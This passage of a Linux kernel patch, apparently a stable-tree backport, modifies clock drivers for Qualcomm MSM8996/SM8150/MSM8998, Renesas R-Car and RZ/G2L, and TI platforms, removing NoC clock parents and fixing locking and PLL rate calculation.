+-	{ }
+-};
+-
+-static struct clk_rcg2 config_noc_clk_src = {
+-	.cmd_rcgr = 0x0500c,
+-	.hid_width = 5,
+-	.parent_map = gcc_xo_gpll0_map,
+-	.freq_tbl = ftbl_config_noc_clk_src,
+-	.clkr.hw.init = &(struct clk_init_data){
+-		.name = "config_noc_clk_src",
+-		.parent_data = gcc_xo_gpll0,
+-		.num_parents = ARRAY_SIZE(gcc_xo_gpll0),
+-		.ops = &clk_rcg2_ops,
+-	},
+-};
+-
+-static const struct freq_tbl ftbl_periph_noc_clk_src[] = {
+-	F(19200000, P_XO, 1, 0, 0),
+-	F(37500000, P_GPLL0, 16, 0, 0),
+-	F(50000000, P_GPLL0, 12, 0, 0),
+-	F(75000000, P_GPLL0, 8, 0, 0),
+-	F(100000000, P_GPLL0, 6, 0, 0),
+-	{ }
+-};
+-
+-static struct clk_rcg2 periph_noc_clk_src = {
+-	.cmd_rcgr = 0x06014,
+-	.hid_width = 5,
+-	.parent_map = gcc_xo_gpll0_map,
+-	.freq_tbl = ftbl_periph_noc_clk_src,
+-	.clkr.hw.init = &(struct clk_init_data){
+-		.name = "periph_noc_clk_src",
+-		.parent_data = gcc_xo_gpll0,
+-		.num_parents = ARRAY_SIZE(gcc_xo_gpll0),
+-		.ops = &clk_rcg2_ops,
+-	},
+-};
+-
+ static const struct freq_tbl ftbl_usb30_master_clk_src[] = {
+ 	F(19200000, P_XO, 1, 0, 0),
+ 	F(120000000, P_GPLL0, 5, 0, 0),
+@@ -1298,11 +1233,7 @@ static struct clk_branch gcc_mmss_noc_cfg_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_mmss_noc_cfg_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&config_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT | CLK_IGNORE_UNUSED,
++			.flags = CLK_IGNORE_UNUSED,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -1465,11 +1396,6 @@ static struct clk_branch gcc_usb_phy_cfg_ahb2phy_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_usb_phy_cfg_ahb2phy_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&periph_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -1499,11 +1425,6 @@ static struct clk_branch gcc_sdcc1_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_sdcc1_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&periph_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -1550,11 +1471,6 @@ static struct clk_branch gcc_sdcc2_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_sdcc2_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&periph_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -1584,11 +1500,6 @@ static struct clk_branch gcc_sdcc3_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_sdcc3_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&periph_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -1618,11 +1529,6 @@ static struct clk_branch gcc_sdcc4_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_sdcc4_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&periph_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -1636,11 +1542,6 @@ static struct clk_branch gcc_blsp1_ahb_clk = {
+ 		.enable_mask = BIT(17),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_blsp1_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&periph_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -1978,11 +1879,6 @@ static struct clk_branch gcc_blsp2_ahb_clk = {
+ 		.enable_mask = BIT(15),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_blsp2_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&periph_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -2319,11 +2215,6 @@ static struct clk_branch gcc_pdm_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_pdm_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&periph_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -2354,11 +2245,6 @@ static struct clk_branch gcc_prng_ahb_clk = {
+ 		.enable_mask = BIT(13),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_prng_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&config_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -2371,11 +2257,6 @@ static struct clk_branch gcc_tsif_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_tsif_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&periph_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -2423,11 +2304,6 @@ static struct clk_branch gcc_boot_rom_ahb_clk = {
+ 		.enable_mask = BIT(10),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_boot_rom_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&config_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -2521,11 +2397,6 @@ static struct clk_branch gcc_pcie_0_slv_axi_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_pcie_0_slv_axi_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&system_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -2538,11 +2409,6 @@ static struct clk_branch gcc_pcie_0_mstr_axi_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_pcie_0_mstr_axi_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&system_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -2555,11 +2421,6 @@ static struct clk_branch gcc_pcie_0_cfg_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_pcie_0_cfg_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&config_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -2607,11 +2468,6 @@ static struct clk_branch gcc_pcie_1_slv_axi_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_pcie_1_slv_axi_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&system_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -2624,11 +2480,6 @@ static struct clk_branch gcc_pcie_1_mstr_axi_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_pcie_1_mstr_axi_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&system_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -2641,11 +2492,6 @@ static struct clk_branch gcc_pcie_1_cfg_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_pcie_1_cfg_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&config_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -2693,11 +2539,6 @@ static struct clk_branch gcc_pcie_2_slv_axi_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_pcie_2_slv_axi_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&system_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -2710,11 +2551,6 @@ static struct clk_branch gcc_pcie_2_mstr_axi_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_pcie_2_mstr_axi_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&system_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -2727,11 +2563,6 @@ static struct clk_branch gcc_pcie_2_cfg_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_pcie_2_cfg_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&config_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -2779,11 +2610,6 @@ static struct clk_branch gcc_pcie_phy_cfg_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_pcie_phy_cfg_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&config_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -2830,11 +2656,6 @@ static struct clk_branch gcc_ufs_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_ufs_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&config_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -3061,11 +2882,7 @@ static struct clk_branch gcc_aggre0_snoc_axi_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_aggre0_snoc_axi_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&system_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT | CLK_IS_CRITICAL,
++			.flags = CLK_IS_CRITICAL,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -3078,11 +2895,7 @@ static struct clk_branch gcc_aggre0_cnoc_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_aggre0_cnoc_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&config_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT | CLK_IS_CRITICAL,
++			.flags = CLK_IS_CRITICAL,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -3095,11 +2908,7 @@ static struct clk_branch gcc_smmu_aggre0_axi_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_smmu_aggre0_axi_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&system_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT | CLK_IS_CRITICAL,
++			.flags = CLK_IS_CRITICAL,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -3112,11 +2921,7 @@ static struct clk_branch gcc_smmu_aggre0_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_smmu_aggre0_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&config_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT | CLK_IS_CRITICAL,
++			.flags = CLK_IS_CRITICAL,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -3163,10 +2968,6 @@ static struct clk_branch gcc_dcc_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_dcc_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&config_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -3179,10 +2980,6 @@ static struct clk_branch gcc_aggre0_noc_mpu_cfg_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_aggre0_noc_mpu_cfg_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&config_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -3195,11 +2992,6 @@ static struct clk_branch gcc_qspi_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_qspi_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&periph_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -3348,10 +3140,6 @@ static struct clk_branch gcc_mss_cfg_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_mss_cfg_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&config_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -3364,10 +3152,6 @@ static struct clk_branch gcc_mss_mnoc_bimc_axi_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_mss_mnoc_bimc_axi_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&system_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -3380,10 +3164,6 @@ static struct clk_branch gcc_mss_snoc_axi_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_mss_snoc_axi_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&system_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -3396,10 +3176,6 @@ static struct clk_branch gcc_mss_q6_bimc_axi_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_mss_q6_bimc_axi_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&system_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -3495,9 +3271,6 @@ static struct clk_regmap *gcc_msm8996_clocks[] = {
+ 	[GPLL0] = &gpll0.clkr,
+ 	[GPLL4_EARLY] = &gpll4_early.clkr,
+ 	[GPLL4] = &gpll4.clkr,
+-	[SYSTEM_NOC_CLK_SRC] = &system_noc_clk_src.clkr,
+-	[CONFIG_NOC_CLK_SRC] = &config_noc_clk_src.clkr,
+-	[PERIPH_NOC_CLK_SRC] = &periph_noc_clk_src.clkr,
+ 	[USB30_MASTER_CLK_SRC] = &usb30_master_clk_src.clkr,
+ 	[USB30_MOCK_UTMI_CLK_SRC] = &usb30_mock_utmi_clk_src.clkr,
+ 	[USB3_PHY_AUX_CLK_SRC] = &usb3_phy_aux_clk_src.clkr,
+diff --git a/drivers/clk/qcom/gcc-sm8150.c b/drivers/clk/qcom/gcc-sm8150.c
+index 09cf827addabe..4501c15c4a417 100644
+--- a/drivers/clk/qcom/gcc-sm8150.c
++++ b/drivers/clk/qcom/gcc-sm8150.c
+@@ -792,7 +792,7 @@ static struct clk_rcg2 gcc_sdcc2_apps_clk_src = {
+ 		.name = "gcc_sdcc2_apps_clk_src",
+ 		.parent_data = gcc_parents_6,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_6),
+-		.flags = CLK_SET_RATE_PARENT,
++		.flags = CLK_OPS_PARENT_ENABLE,
+ 		.ops = &clk_rcg2_floor_ops,
+ 	},
+ };
+diff --git a/drivers/clk/qcom/mmcc-msm8998.c b/drivers/clk/qcom/mmcc-msm8998.c
+index c421b12916516..e5a72c2f080f8 100644
+--- a/drivers/clk/qcom/mmcc-msm8998.c
++++ b/drivers/clk/qcom/mmcc-msm8998.c
+@@ -2478,6 +2478,7 @@ static struct clk_branch fd_ahb_clk = {
+ 
+ static struct clk_branch mnoc_ahb_clk = {
+ 	.halt_reg = 0x5024,
++	.halt_check = BRANCH_HALT_SKIP,
+ 	.clkr = {
+ 		.enable_reg = 0x5024,
+ 		.enable_mask = BIT(0),
+@@ -2493,6 +2494,7 @@ static struct clk_branch mnoc_ahb_clk = {
+ 
+ static struct clk_branch bimc_smmu_ahb_clk = {
+ 	.halt_reg = 0xe004,
++	.halt_check = BRANCH_HALT_SKIP,
+ 	.hwcg_reg = 0xe004,
+ 	.hwcg_bit = 1,
+ 	.clkr = {
+@@ -2510,6 +2512,7 @@ static struct clk_branch bimc_smmu_ahb_clk = {
+ 
+ static struct clk_branch bimc_smmu_axi_clk = {
+ 	.halt_reg = 0xe008,
++	.halt_check = BRANCH_HALT_SKIP,
+ 	.hwcg_reg = 0xe008,
+ 	.hwcg_bit = 1,
+ 	.clkr = {
+@@ -2650,11 +2653,13 @@ static struct gdsc camss_cpp_gdsc = {
+ static struct gdsc bimc_smmu_gdsc = {
+ 	.gdscr = 0xe020,
+ 	.gds_hw_ctrl = 0xe024,
++	.cxcs = (unsigned int []){ 0xe008 },
++	.cxc_count = 1,
+ 	.pd = {
+ 		.name = "bimc_smmu",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
+-	.flags = HW_CTRL | ALWAYS_ON,
++	.flags = VOTABLE,
+ };
+ 
+ static struct clk_regmap *mmcc_msm8998_clocks[] = {
+diff --git a/drivers/clk/renesas/rcar-cpg-lib.c b/drivers/clk/renesas/rcar-cpg-lib.c
+index e2e0447de1901..5a15f8788b922 100644
+--- a/drivers/clk/renesas/rcar-cpg-lib.c
++++ b/drivers/clk/renesas/rcar-cpg-lib.c
+@@ -70,8 +70,21 @@ void cpg_simple_notifier_register(struct raw_notifier_head *notifiers,
+ #define STPnHCK	BIT(9 - SDnSRCFC_SHIFT)
+ 
+ static const struct clk_div_table cpg_sdh_div_table[] = {
++	/*
++	 * These values are recommended by the datasheet.  Because they come
++	 * first, Linux will only use these.
++	 */
+ 	{ 0, 1 }, { 1, 2 }, { STPnHCK | 2, 4 }, { STPnHCK | 3, 8 },
+-	{ STPnHCK | 4, 16 }, { 0, 0 },
++	{ STPnHCK | 4, 16 },
++	/*
++	 * These values are not recommended because STPnHCK is wrong.  But they
++	 * have been seen because of broken firmware.  So, we support reading
++	 * them but Linux will sanitize them when initializing through
++	 * recalc_rate.
++	 */
++	{ STPnHCK | 0, 1 }, { STPnHCK | 1, 2 },  { 2, 4 }, { 3, 8 }, { 4, 16 },
++	/* Sentinel */
++	{ 0, 0 }
+ };
+ 
+ struct clk * __init cpg_sdh_clk_register(const char *name,
+diff --git a/drivers/clk/renesas/rzg2l-cpg.c b/drivers/clk/renesas/rzg2l-cpg.c
+index 2c877576c5729..84767cfc1e739 100644
+--- a/drivers/clk/renesas/rzg2l-cpg.c
++++ b/drivers/clk/renesas/rzg2l-cpg.c
+@@ -11,6 +11,7 @@
+  * Copyright (C) 2015 Renesas Electronics Corp.
+  */
+ 
++#include <linux/bitfield.h>
+ #include <linux/clk.h>
+ #include <linux/clk-provider.h>
+ #include <linux/clk/renesas.h>
+@@ -39,14 +40,13 @@
+ #define WARN_DEBUG(x)	do { } while (0)
+ #endif
+ 
+-#define DIV_RSMASK(v, s, m)	((v >> s) & m)
+ #define GET_SHIFT(val)		((val >> 12) & 0xff)
+ #define GET_WIDTH(val)		((val >> 8) & 0xf)
+ 
+-#define KDIV(val)		DIV_RSMASK(val, 16, 0xffff)
+-#define MDIV(val)		DIV_RSMASK(val, 6, 0x3ff)
+-#define PDIV(val)		DIV_RSMASK(val, 0, 0x3f)
+-#define SDIV(val)		DIV_RSMASK(val, 0, 0x7)
++#define KDIV(val)		((s16)FIELD_GET(GENMASK(31, 16), val))
++#define MDIV(val)		FIELD_GET(GENMASK(15, 6), val)
++#define PDIV(val)		FIELD_GET(GENMASK(5, 0), val)
++#define SDIV(val)		FIELD_GET(GENMASK(2, 0), val)
+ 
+ #define CLK_ON_R(reg)		(reg)
+ #define CLK_MON_R(reg)		(0x180 + (reg))
+@@ -192,7 +192,9 @@ static int rzg2l_cpg_sd_clk_mux_set_parent(struct clk_hw *hw, u8 index)
+ 	u32 off = GET_REG_OFFSET(hwdata->conf);
+ 	u32 shift = GET_SHIFT(hwdata->conf);
+ 	const u32 clk_src_266 = 2;
+-	u32 bitmask;
++	u32 msk, val, bitmask;
++	unsigned long flags;
++	int ret;
+ 
+ 	/*
+ 	 * As per the HW manual, we should not directly switch from 533 MHz to
+@@ -206,26 +208,30 @@ static int rzg2l_cpg_sd_clk_mux_set_parent(struct clk_hw *hw, u8 index)
+ 	 * the index to value mapping is done by adding 1 to the index.
+ 	 */
+ 	bitmask = (GENMASK(GET_WIDTH(hwdata->conf) - 1, 0) << shift) << 16;
++	msk = off ? CPG_CLKSTATUS_SELSDHI1_STS : CPG_CLKSTATUS_SELSDHI0_STS;
++	spin_lock_irqsave(&priv->rmw_lock, flags);
+ 	if (index != clk_src_266) {
+-		u32 msk, val;
+-		int ret;
+-
+ 		writel(bitmask | ((clk_src_266 + 1) << shift), priv->base + off);
+ 
+-		msk = off ? CPG_CLKSTATUS_SELSDHI1_STS : CPG_CLKSTATUS_SELSDHI0_STS;
+-
+-		ret = readl_poll_timeout(priv->base + CPG_CLKSTATUS, val,
+-					 !(val & msk), 100,
+-					 CPG_SDHI_CLK_SWITCH_STATUS_TIMEOUT_US);
+-		if (ret) {
+-			dev_err(priv->dev, "failed to switch clk source\n");
+-			return ret;
+-		}
++		ret = readl_poll_timeout_atomic(priv->base + CPG_CLKSTATUS, val,
++						!(val & msk), 10,
++						CPG_SDHI_CLK_SWITCH_STATUS_TIMEOUT_US);
++		if (ret)
++			goto unlock;
+ 	}
+ 
+ 	writel(bitmask | ((index + 1) << shift), priv->base + off);
+ 
+-	return 0;
++	ret = readl_poll_timeout_atomic(priv->base + CPG_CLKSTATUS, val,
++					!(val & msk), 10,
++					CPG_SDHI_CLK_SWITCH_STATUS_TIMEOUT_US);
++unlock:
++	spin_unlock_irqrestore(&priv->rmw_lock, flags);
++
++	if (ret)
++		dev_err(priv->dev, "failed to switch clk source\n");
++
++	return ret;
+ }
+ 
+ static u8 rzg2l_cpg_sd_clk_mux_get_parent(struct clk_hw *hw)
+@@ -236,14 +242,8 @@ static u8 rzg2l_cpg_sd_clk_mux_get_parent(struct clk_hw *hw)
+ 
+ 	val >>= GET_SHIFT(hwdata->conf);
+ 	val &= GENMASK(GET_WIDTH(hwdata->conf) - 1, 0);
+-	if (val) {
+-		val--;
+-	} else {
+-		/* Prohibited clk source, change it to 533 MHz(reset value) */
+-		rzg2l_cpg_sd_clk_mux_set_parent(hw, 0);
+-	}
+ 
+-	return val;
++	return val ? val - 1 : 0;
+ }
+ 
+ static const struct clk_ops rzg2l_cpg_sd_clk_mux_ops = {
+@@ -699,18 +699,18 @@ static unsigned long rzg2l_cpg_pll_clk_recalc_rate(struct clk_hw *hw,
+ 	struct pll_clk *pll_clk = to_pll(hw);
+ 	struct rzg2l_cpg_priv *priv = pll_clk->priv;
+ 	unsigned int val1, val2;
+-	unsigned int mult = 1;
+-	unsigned int div = 1;
++	u64 rate;
+ 
+ 	if (pll_clk->type != CLK_TYPE_SAM_PLL)
+ 		return parent_rate;
+ 
+ 	val1 = readl(priv->base + GET_REG_SAMPLL_CLK1(pll_clk->conf));
+ 	val2 = readl(priv->base + GET_REG_SAMPLL_CLK2(pll_clk->conf));
+-	mult = MDIV(val1) + KDIV(val1) / 65536;
+-	div = PDIV(val1) << SDIV(val2);
+ 
+-	return DIV_ROUND_CLOSEST_ULL((u64)parent_rate * mult, div);
++	rate = mul_u64_u32_shr(parent_rate, (MDIV(val1) << 16) + KDIV(val1),
++			       16 + SDIV(val2));
++
++	return DIV_ROUND_CLOSEST_ULL(rate, PDIV(val1));
+ }
+ 
+ static const struct clk_ops rzg2l_cpg_pll_ops = {
+diff --git a/drivers/clk/renesas/rzg2l-cpg.h b/drivers/clk/renesas/rzg2l-cpg.h
+index b33a3e79161b6..aefa53a900597 100644
+--- a/drivers/clk/renesas/rzg2l-cpg.h
++++ b/drivers/clk/renesas/rzg2l-cpg.h
+@@ -43,7 +43,7 @@
+ #define CPG_CLKSTATUS_SELSDHI0_STS	BIT(28)
+ #define CPG_CLKSTATUS_SELSDHI1_STS	BIT(29)
+ 
+-#define CPG_SDHI_CLK_SWITCH_STATUS_TIMEOUT_US	20000
++#define CPG_SDHI_CLK_SWITCH_STATUS_TIMEOUT_US	200
+ 
+ /* n = 0/1/2 for PLL1/4/6 */
+ #define CPG_SAMPLL_CLK1(n)	(0x04 + (16 * n))
+diff --git a/drivers/clk/ti/apll.c b/drivers/clk/ti/apll.c
+index dd0709c9c2498..93183287c58db 100644
+--- a/drivers/clk/ti/apll.c
++++ b/drivers/clk/ti/apll.c
+@@ -160,7 +160,7 @@ static void __init omap_clk_register_apll(void *user,
+ 	ad->clk_bypass = __clk_get_hw(clk);
+ 
+ 	name = ti_dt_clk_name(node);
+-	clk = ti_clk_register_omap_hw(NULL, &clk_hw->hw, name);
++	clk = of_ti_clk_register_omap_hw(node, &clk_hw->hw, name);
+ 	if (!IS_ERR(clk)) {
+ 		of_clk_add_provider(node, of_clk_src_simple_get, clk);
+ 		kfree(init->parent_names);
+@@ -400,7 +400,7 @@ static void __init of_omap2_apll_setup(struct device_node *node)
+ 		goto cleanup;
+ 
+ 	name = ti_dt_clk_name(node);
+-	clk = ti_clk_register_omap_hw(NULL, &clk_hw->hw, name);
++	clk = of_ti_clk_register_omap_hw(node, &clk_hw->hw, name);
+ 	if (!IS_ERR(clk)) {
+ 		of_clk_add_provider(node, of_clk_src_simple_get, clk);
+ 		kfree(init);
+diff --git a/drivers/clk/ti/clk-dra7-atl.c b/drivers/clk/ti/clk-dra7-atl.c
+index ff4d6a9516813..1c576599f6dbd 100644
+--- a/drivers/clk/ti/clk-dra7-atl.c
++++ b/drivers/clk/ti/clk-dra7-atl.c
+@@ -197,7 +197,7 @@ static void __init of_dra7_atl_clock_setup(struct device_node *node)
+ 
+ 	init.parent_names = parent_names;
+ 
+-	clk = ti_clk_register(NULL, &clk_hw->hw, name);
++	clk = of_ti_clk_register(node, &clk_hw->hw, name);
+ 
+ 	if (!IS_ERR(clk)) {
+ 		of_clk_add_provider(node, of_clk_src_simple_get, clk);
+diff --git a/drivers/clk/ti/clk.c b/drivers/clk/ti/clk.c
+index 1dc2f15fb75b2..269355010cdce 100644
